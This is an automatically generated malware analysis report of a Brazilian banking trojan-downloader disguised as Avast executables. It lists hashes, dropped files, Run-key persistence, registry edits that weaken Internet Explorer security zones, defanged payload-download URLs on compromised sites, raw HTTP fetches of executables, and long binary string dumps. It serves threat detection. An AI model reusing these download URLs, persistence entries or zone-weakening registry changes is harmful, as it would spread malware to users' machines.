Gen.Variant.Barys.547_d340d14427

by malwarelabrobot on December 12th, 2014 in Malware Descriptions.

HEUR:Trojan-Downloader.Win32.Generic (Kaspersky), Gen:Variant.Barys.547 (B) (Emsisoft), Gen:Variant.Barys.547 (AdAware), Trojan-Banker.Win32.Brasil.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Banker, Trojan, VirTool


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: d340d14427a8b2fc99ac434826471633
SHA1: b2f409befabf46c35df59c821963f68d83ddb615
SHA256: b89cc8136a1d98d1feda39c61ab3058f63f240a84586dbd6509944812eba2a4b
SSDeep: 24576:dmV0PI0ZwjRpha/Ll6FfRjiQsWv85VJsgty:dlI0Zu7ILIjiQsFfeQy
Size: 1048064 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, ACProtect141
Company: infidus vilitas facio
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXPESX SP3 32-bit


Summary:

Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

net1.exe:2028
net.exe:420
mscorsvw.exe:1912
%original file name%.exe:472

The Trojan injects its code into the following process(es):

AvastK.exe:1520
AvastV.exe:1252

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process AvastK.exe:1520 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\EMBUTIR1.exe (105 bytes)

The process %original file name%.exe:472 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\AvastK.exe (16954 bytes)
%Documents and Settings%\%current user%\Application Data\AvastV.exe (54343 bytes)

The process AvastV.exe:1252 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\mip.dat (38 bytes)
%Documents and Settings%\%current user%\Application Data\idpc.d (9 bytes)
%Documents and Settings%\%current user%\Application Data\icone.cur (326 bytes)

Registry activity

The process net1.exe:2028 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "48 BC EE 26 A3 3A C1 33 AD CF 81 20 AF 9F 5B 12"

The process AvastK.exe:1520 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A D9 60 A0 06 20 8A E8 91 CC E4 B7 6A B5 E0 BC"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process net.exe:420 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A 0E 9B CF FB 4B 6D 0E 2C 1B 8D E2 2A 0F C4 E6"

The process mscorsvw.exe:1912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "2340000"

The process %original file name%.exe:472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BD 46 B9 A6 3B EE 77 34 C0 7B C5 49 24 FC 23 40"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data]
"AvastV.exe" = "AvastV"
"AvastK.exe" = "AvastK"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process AvastV.exe:1252 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "68 8C F8 C8 0B 93 F6 4E 76 CB DE 84 8F 8E 60 1D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoChangeStartMenu" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"noclose" = "0"
"NoLogOff" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"DesktopU" = "%Documents and Settings%\%current user%\Application Data\AvastV.exe"

Dropped PE files

MD5 File path
4d4435ccf1ebc2763aaa0da2fb693af7 c:\Documents and Settings\"%CurrentUserName%"\Application Data\AvastK.exe
00bda0312fb0cc6a27ff977d6f5e5b29 c:\Documents and Settings\"%CurrentUserName%"\Application Data\AvastV.exe
436c8bca82066f05f6152161bb4450ab c:\Documents and Settings\"%CurrentUserName%"\Application Data\EMBUTIR1.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
CODE 4096 934912 934912 4.48199 6b7b952038ce3993f0e37f0336abbcb2
DATA 942080 8164 8192 3.12131 6f05714e4fd75635a3cbecb646fc0d59
BSS 950272 4549 0 0 d41d8cd98f00b204e9800998ecf8427e
.idata 958464 10824 11264 3.4188 b561ce93d5f0ad04493a26e69b4ba223
.tls 970752 16 0 0 d41d8cd98f00b204e9800998ecf8427e
.rdata 974848 24 512 0.139033 0326ef98f785f08357d324c6fabf81c1
.reloc 978944 57492 57856 4.61083 4908082c562d09e805b3be4046370b1b
.rsrc 1040384 34304 34304 3.02535 b417de969b404560d03aa0410159a811

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://sodesasystem.com/guayos/modules/mod_jcomments/images/ht/_x_.png
hxxp://sodesasystem.com/guayos/modules/mod_jcomments/images/ht/w_x_.png
hxxp://igrejaeterna.com.br/media/editors/codemirror/css/codemirror.txt
hxxp://thanhhaievent.com/modules/mod_articles_archive/tmpl/html/o/o.php 112.78.2.207
hxxp://www.igrejaeterna.com.br/media/editors/codemirror/css/codemirror.txt 199.201.88.34
hxxp://www.sodesasystem.com/guayos/modules/mod_jcomments/images/ht/_x_.png 69.73.159.23
hxxp://www.sodesasystem.com/guayos/modules/mod_jcomments/images/ht/w_x_.png 69.73.159.23


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /guayos/modules/mod_jcomments/images/ht/_x_.png HTTP/1.1
Content-Type: text/html
Host: VVV.sodesasystem.com
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36


HTTP/1.1 200 OK
Date: Thu, 11 Dec 2014 13:38:41 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
ETag: "393600-5469eebf-1b3fa9566fd6953c"
Last-Modified: Mon, 17 Nov 2014 12:49:03 GMT
Content-Type: image/png
Content-Length: 3749376
Vary: User-Agent
Cache-Control: public, max-age=604800
Expires: Thu, 18 Dec 2014 13:38:41 GMT
MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
.........Z'[email protected]...........
[email protected]... ....%.....................
d"....................................................................
..............CODE................................ ..`DATA.....}......
.~..................@...BSS..........p.......Z...................idata
[email protected]................................
[email protected]".......$........
[email protected].....%.. ....%[email protected].
[email protected]..............................................
......................................................................
[email protected]...........@.
.False.True.@.,[email protected]..........@[email protected][email protected]
[email protected][email protected][email protected]....
[email protected]..@[email protected][email protected][email protected]..@.
[email protected][email protected][email protected]@[email protected]@..6
@[email protected]@.$4@.`[email protected][email protected][email protected][email protected]
face....................F.System......D$....N...D$... N...D$...5N.....
.@...@[email protected]..@[email protected].@...@.............
<<< skipped >>>


GET /media/editors/codemirror/css/codemirror.txt HTTP/1.1
Content-Type: text/html
Host: VVV.igrejaeterna.com.br
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; it;rv:1.8.1.12)


HTTP/1.1 200 OK
Date: Thu, 11 Dec 2014 13:38:48 GMT
Server: Apache
Last-Modified: Sat, 04 Oct 2014 20:12:05 GMT
ETag: "2605805-26-5049e76a36139"
Accept-Ranges: bytes
Content-Length: 38
Connection: close
Content-Type: text/plain
4D88B41DB11FC174D87A9E32D370D5369D3092..



GET /guayos/modules/mod_jcomments/images/ht/w_x_.png HTTP/1.1
Content-Type: text/html
Host: VVV.sodesasystem.com
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36


HTTP/1.1 200 OK
Date: Thu, 11 Dec 2014 13:38:44 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
ETag: "13e400-546b3858-f33bee62cde292a0"
Last-Modified: Tue, 18 Nov 2014 12:15:20 GMT
Content-Type: image/png
Content-Length: 1303552
Vary: User-Agent
Cache-Control: public, max-age=604800
Expires: Thu, 18 Dec 2014 13:38:44 GMT
MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
.....d...|.......s............@..........................`............
[email protected]'.......H...................P..
8............................@........................................
..............CODE.....d.......d.................. ..`DATA.....V......
.X...h..............@...BSS.....e................................idata
..r'.......([email protected]......................
.....rdata.......@[email protected]............
[email protected][email protected].............`..
[email protected]..............................................
......................................................................
[email protected]...........@.
.False.True.@.,[email protected]..........@[email protected][email protected]
[email protected][email protected][email protected]....
[email protected]..@...............................@.........|>@..
>@..>@..>@..>@..;@..;@.$<@[email protected]..@....
[email protected]$...MQ.
..D$...kQ...D$...uQ....][email protected][email protected][email protected]}.@..........@.
..@...@...........................@.......@.|>@[email protected]@..>@.
<<< skipped >>>


GET /modules/mod_articles_archive/tmpl/html/o/o.php HTTP/1.1
Content-Type: text/html
Host: thanhhaievent.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 403 Forbidden
Server: nginx admin
Date: Thu, 11 Dec 2014 13:38:46 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1
Connection: keep-alive
...

The Trojan connects to the servers at the folowing location(s):

AvastV.exe_1252:

.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
comctl32.dll
USER32.DLL
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
OnKeyDown
OnKeyPress
OnKeyUp$
PasswordChar
OnKeyUp
ssHorizontal
OnKeyUpd'D
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
OnExecute
OnExecute
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
tagMSG
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
TDXTCPClient
1.2.3
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
%s, %d %s %d %s %s
password
Password
IdHTTPHeaderInfo
ProxyPasswordT
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
ftpTransfer
ftpReady
ftpAborted
ClientPortMinT
ClientPortMax
Port
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
saUsernamePassword
PasswordT
0.0.0.1
TIdTCPConnection
IdTCPConnection
EIdTCPConnectionError
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFiletz@
CertFiletz@
KeyFile
OnGetPassword
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertErrorP
EIdOSSLLoadingKeyError
TIdTCPClient
IdTCPClient
BoundPort
PortU
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPResponseT
TIdHTTPRequest
TIdHTTPProtocol
TIdCustomHTTP
TIdCustomHTTP
TIdHTTP
TIdHTTPP
HTTPOptions
Port(
EIdHTTPProtocolException
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
OnActionExecute
Portable Network Graphics
UXTHEME.DLL
c:\program files\borland\delphi7\Lib\ASXPVS.pas
TSQLTimeStampVariantType
TSQLTimeStampData
SqlTimSt
ole32.dll
SQLTimeStamp
Password
TLoginDialog
TPasswordDialog
c:\program files\borland\delphi7\Lib\ACXPVS.pas
c:\program files\borland\delphi7\Lib\CEXPVS.pas
iexplore.exe
COMCTL32.DLL
TaskDialogIndirect
c:\program files\borland\delphi7\Lib\AOBXPVS.pas
URLColor
OnKeyPress
TMonochromeLookup
Uh.LO
edt_bcd4KeyPress
edt_bcd1KeyPress
edt_bcd2KeyPress
edt_bcd3KeyPress
edt_casKeyPress
edt_dchKeyPress
edt_tkdKeyPress
edt_seeKeyPress
edt_isefKeyPress
edt_eleKeyPress
edt_eluKeyPress
edt_elpKeyPress
edt_elfKeyPress
edt_itbfKeyPress
edt_dtiKeyPress
edt_sepKeyPress
edt_itbf2KeyPress
edt_seuKeyPress
edt_tkfKeyPress
edt_tkeKeyPress
edt_tkpKeyPress
edt_tkuKeyPress
SKINDATA.SK2
edt_stkKeyPress
edt_siasKeyPress
Software\Microsoft\Windows\DWM
ic.cur
icone.cur
chrome
opera
"!@#**%&* ()_ |<>:****?
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
inflate 1.2.3 Copyright 1995-2005 Mark Adler
?456789:;<=
!"#$%&'()* ,-./0123
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegCreateKeyExA
WinExec
GetWindowsDirectoryA
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
GetViewportOrgEx
keybd_event
VkKeyScanA
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
GetAsyncKeyState
EnumWindows
EnumThreadWindows
EnumChildWindows
ActivateKeyboardLayout
olepro32.dll
shell32.dll
ShellExecuteExA
ShellExecuteA
wsock32.dll
gdiplus.dll
GdipSetImageAttributesColorKeys
GdipSetStringFormatHotkeyPrefix
GdiplusShutdown
winmm.dll
?$?*?2?=?
? ?$?(?,?
=#='= =;=
6}7
4 4&424:4
6%6 676?6{6
6074787<7@7
<#<7<?<]<
: :$:(:6:>:
; ;$;(;,;0;4;8;<;@;
;)<2<@<|<
0!0%0)0-010
; ;$;(;,;0;4;8;\;|;
6|7
01l1
2 2$2(2,2024282<2\2|2
3.42464<4
88Q8c8
;!;/;_<|<
4-4J4Y4j4}4
:":':1:;:@:
0 0$0(0,0004080<0@0`0
8"8&8*8.8
4 4$4(4,4044484<4@4\4|4
2 2(20282
040'1;1`1
40`0>3~3
< <$<(<,<0<
=$=)=-=1=5=9===,>
7$7(7,7074787
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
"%UUU""
""""""""""$DDDDDDD""UUUUUUUR"""""""""""DDDDDDDB"%UUUUUUU""""""""""
%UUUUUUU"
""#2"3"""
$"#2"3"%"
"""3#2"""
$""3#2"%"
"""#3""""
$""#3""%"
""""""""""%UUUUUUU""DDDDDDDB
""""""""""%UUUUUUU""DDDDDDDB"""""""""""UUUUUUUR"$DDDDDDD""""""""""
% ) CmDEpsMOab
'2699640**&#
33333333333333
337373?3
333373?33
33333337
3733333
3337333
3333373
3737333
373333?3
3333333333
333333333
333?33?333
333373?3
33333333330
"66DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD6666/"!
66DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD6666/"!
?===>=>)=>(9"/
'99(999:99770
""""3333""""
fQTv....Rtlb
:1 =;;= 1
 ===8:] ==;= 1
:#==;= 1
::';;= 1
:::'=;= 1
*=== -  ==;= 1
 == .-  =;;= 1
#&'7'61=;= 1
%,./0000/0.-,%
*-....-..--*
$),,---.,-,)($
%(*)))),)(%
}?|}?|}?|}?|}?|
"""!"""@
3331333@
0000000000
00000000003
60??0000
...???0000?
000000000000
0?.CPB@@iiggec\\Y@@!BBO 'P***C
.??0??...
.????0?.CCCC"mgec\\@@!BB 'P*CC'
.??00000??.Cc\Y@
00?.CP\@@BBO 'PC
C\\@@@!BB  'PP*CC.BO**PP  OOOO   'PP**
U"""""Ã3333D"""""$
#::""::#
33333330
%%%###==
=##%%%#/9
%%%####%%####==
<<<\\<<::::
]\[ZY/US*(%F
 &#$&)-/--)))"
 $#$&)--)&&$'
($#$)--)-))&,
*)&)-//--)%
')&)-////--!
1'$%'*...**'*"
1%#%'*. *'%%,
-%#%'***..*'2
,*'*..33.*6
/*'*....**)
,&$%&( .  ((("
,%$%((  ((&%*
*%$%(   . (&-
) ( ....  0
,(( ....  '
.dddd
3;88558;855//3-
3<;888;;3
#....JaJ,))))#
;58;;80008;84 7
8511-/0.
`111/--/*
7141----*
8144----,'
<174-)())'
66666666
..vEeeei4
2"""22%2"2"2"2"
555555555
3333""""#
B"""$DDDDDDD"""""""""""""""""""""""""%UUUUUUU""""Va
fffffR"""%UUUUUUU""""(
11111111111
000000000
7755555555555555
1:
KWindows
UrlMon
rSqlTimSt
0IdHTTPHeaderInfo
 IdTCPServer
IdTCPStream
.MaskEdEx
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
Picture.Data
.hs(9
.DT@i
.Xwwr
T.NBQ
l.EdV5N
>WH(BJ%s,
Wm#&>9%UV
L%US\
.MxTw
d)q %xR
$'%X6
-j}XT
%SpmM
\}-3}7
%SqZ$S
q>.HX
}.iVsg;o
Dw4.rm
`.ybr|
UjV.kE
>6Tm.rF
i}%uV5/
'.xB<
 z.YS^y
.mj 6>
ey.gZF
cBEQ=.VL
544444444
b..N3gL%UJ
.wa!!
!_%UY
T.Ct:R(@
]vM%U2X
.Sr]m
L[;;;.Sj
.TYURV
Se|.Em(,
dH6\%S
4   [[[3
?.FUd
...NII9
Ai%SR#
q:\u~Mr
%S<tu
I{.QP
W...Nh
rk.nFt
yU%fo
D\>%f
.hmk^]
Hg8%C
,X`f%msg
dkeYe[Sc
JJJ%U
JJJ%UO`
%D|=*9P`
Appearance.BackGroundColor
Appearance.BorderColor
Appearance.ActiveSegmentColor
Appearance.InActiveSegmentColor
clSilver!Appearance.TransitionSegmentColor
Appearance.ProgressSegmentColor
O.kF{
WL^%U
QS-D}
29.Qm
1.2.0.1
X!%Ci
Fu".VX1
m.HHHHl-
p>KeY=
`m.FD:D
n7g.oBn~a[
.rN"X
!Appearance.TransitionSegmentColor
/zv%s
(-joe}9
!,*d-.Uag
.Vixb
.LScZ
.nK$j
?E.rxq
%U$Zfn
,e)=<F%F
B.<
h.Ug|
KeYQ
X.MLj
}.PbgK
keyv
K[%CS
Y-.UTi
Cu.Fud
.WQdm
#c&kEY
MS.rk
.cJ%%:I
u.oNX
1.2.0.0
y.VMM
G/.ZCw
=zx%uu
.QY6k
A(..Faa!
.oK[n
Z.qd"
.XQ^~
.vvv)))w
J){.Vq
%0U_~
U*.cx
!%%4<</7
/,,411155
2.Cslv
~%ChwhX
q.cJ7
:h<
.mOY~
rssh7&
,%%%%u(
~p-w}O[
.GmHII
;s5%:1)%C
a\3d%f
5"%%u
.RNd6|>?
!%%%%%uh
aDv3#qb%F
.IDATx
7o.).NII
.Jh8g
3>41 5==#5
.jZwA
";.BZV
=7\.ig-V
`.My}4
%C X%
Ð^6&vY
P:\R~
iC'%%d
}:I%.TH
6-hW}s
7.SW]
%U(rP
.CePD"
 ((022266
ó6-
.dhRA
j-#)1%d
<.KY,J
.xoPG
.hZ<kc
/E\.nPW
X%DtH
C%F"0
$,C5.JK
%Sxc%
6*-===44
5J.xdw
iU
J.nit
mB.MV
UW]%S
.jB{=Y
%xBg&
.in;t
.WkCM
.eh=t
sg.sc
LoginDialog
Database Login
&Password:
PasswordDialog
Enter password
1.7.1.4
.trRa
"%.xL\
Y%FQ555Y
4>>.FT
oM.dA
K.gzw
t$W`.nq%
%C$BN
uuq%D
&%u<#9 lJ
/.Xqb
%D`;*Z
%xrFZ
a}p%Du}mI
sSHQU
"!%%CT
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
MSGDLG
TMSGRPC
TMSGRPCD
TMSGRPCH
TMSGRPG
TMSGRPGD
TMSGRPGH
TMSGRPU
TMSGRPUD
TMSGRPUH
TSUIPASSWORDDIALOG
TSUIURLLABEL
TLOGINDIALOG
TPASSWORDDIALOG
Unsupported PixelFormat
Invalid stream operation
Invalid extension introducerúiled to allocate memory for GIF DIB
Invalid Image trailerAInternal error: Extension Instance does not match Extension Label,Unsupported Application Extension block size
Unknown GIF block type'Object type not supported for operation
Remote Login
Unsupported GIF version
cThis "Portable Network Graphics" image uses an unknown interlace scheme which could not be decoded.-The chunks must be compatible to be assigned.jThis "Portable Network Graphics" image is invalid because the decoder found an unexpected end of the file.8This "Portable Network Graphics" image contains no data.oSome operation could not be performed because the system is out of resources. Close some windows and try again.OThis operation is not valid because the current image contains no valid header.4The new size provided for image resizing is invalid.
%s is not a valid BCD value$Could not parse SQL TimeStamp string
Invalid SQL date/time values
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
SSL status: "%s"
Host field is emptyjThis "Portable Network Graphics" image is not valid because it contains invalid pieces of data (crc error)yThe "Portable Network Graphics" image could not be loaded because one of its main piece of data (ihdr) might be corruptedUThis "Portable Network Graphics" image is invalid because it has missing image parts.[Could not decompress the image because it contains invalid compressed data.
Description: BThe "Portable Network Graphics" image contains an invalid palette.
The file being readed is not a valid "Portable Network Graphics" image because it contains an invalid header. This file may be corruped, try obtaining it again.nThis "Portable Network Graphics" image is not supported or it might be invalid.
This "Portable Network Graphics" image is not supported because either it's width or height exceeds the maximum size, which is 65535 pixels length.
There is no such palette entry.dThis "Portable Network Graphics" image contains an unknown critical part which could not be decoded.pThis "Portable Network Graphics" image is encoded with an unknown compression scheme which could not be decoded.
Command not supported.
Address type not supported.$Error accepting connection with SSL.
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Protocol family not supported.0Address family not supported by protocol family.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Max line length exceeded.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
Chunk StartedDThis authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.
File "%s" not found1Only one TIdAntiFreeze can exist per application.
No data to read.$Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
Window Text=This control requires version 4.70 or greater of COMCTL32.DLL
Date exceeds maximum of %s
Date is less than minimum of %s4You must be in ShowCheckbox mode to set to this date#Failed to set calendar date or timeúiled to set maximum selection range$Failed to set calendar min/max rangeúiled to set calendar selected range
No help keyword specified.&Cannot change the size of a JPEG image
JPEG error #%d
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Value must be between %d and %d
Invalid clipboard format Clipboard does not support Icons
Text exceeds memo capacity/Menu '%s' is already being used by another form
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
%s property out of range
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Unsupported clipboard format
Invalid stream format$''%s'' is not a valid component name
Invalid property element: %s
Invalid property type: %s
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Operation not supported
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
No argument for format '%s'"Variant method calls not supported
Invalid variant operation%Invalid variant operation (%s%.8x)
%s,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
!'%s' is not a valid integer value('%s' is not a valid floating point value!'%s' is not a valid date and time
'%s' is not a valid GUID value
I/O error %d
2.3.4.5
1.0.0.1

AvastK.exe_1520:

.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
Proportional
MAPI32.DLL
PasswordChar(
OnKeyDown
OnKeyPressD
OnKeyUph
ssHorizontal
OnKeyUpH
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeyword<(A
crSQLWait
%s (%s)
imm32.dll
AutoHotkeysH
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
